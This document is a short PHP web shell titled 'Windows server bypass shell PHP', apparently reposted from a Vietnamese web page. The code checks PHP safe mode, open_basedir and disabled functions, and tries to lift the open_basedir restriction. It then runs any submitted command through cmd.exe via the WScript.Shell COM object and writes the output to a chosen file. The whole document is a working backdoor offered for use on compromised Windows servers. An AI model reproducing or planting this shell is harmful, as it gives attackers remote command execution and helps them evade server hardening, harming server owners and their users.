Windows server bypass shell PHP

<body bgcolor=black>
<center><font color=green>COMMAND EXECUTER (CODED BY NEO)</font></center>
<div align="center"><center>
<table width="558" height="560" border="1" id="AutoNumber1">
<tr>
<td width="49%" height="158"><p><?php
//is safe mod on ? start
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
{
$safe="<font color=red>ON</font>";
}
else {$safe="<font color=green>OFF</font>";}
echo "<font color=whitepurple>SAFE MOD IS :</font><b>$safe</b><br>";
//open safe mod end--
?>

<p>
<?php
//is open basedir on ? start
$n = @ini_get('open_basedir');
if (!empty($n))
{
$base = @ini_restore("open_basedir");
}
else {$base="<font color=green>NONE</font>";}
echo "<font color=whitepurple>OPEN_BASEDIR :</font><b>$base</b><br>";
//open basedir end--
?>

<p align="left">
<?php
//disable function start
echo "<font color=whitepurple>Disable functions :</font> <b>";
if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";}
//disable function end--
?>
<p align="left">
<?php
//phpver start
$phpver=phpversion();
echo "<font color=whitepurple>PHP Version :</font><font color=red><b>$phpver</b></font><br>";
//phpver end--
?>
<p align="left">
<?php
//path of win
$dir = @getcwd();
echo "<font color=whitepurple>U'Re In :</font><font color=red><b>$dir</b></font><br>";
//end
?>

<?php
print "<form method=post>";
print "<b><font color=white>cmd:</b></font><input size=50 name='command' value=''>";
print "<br>";
print "<b><font color=white>file :</b></font><input size=50 name='file' value=''>";
print "<br>";
print "<input type=submit name=_act value='Execute!'>";
$post = $_POST['command'];
$file = $_POST['file'];
?>
<?php
$_file = new COM("WScript.Shell");
$_file ->Run('cmd.exe /c'.$post.' > '.dirname($_SERVER[SCRIPT_FILENAME]).'/'.$file.'');
?>

Bài viết liên quan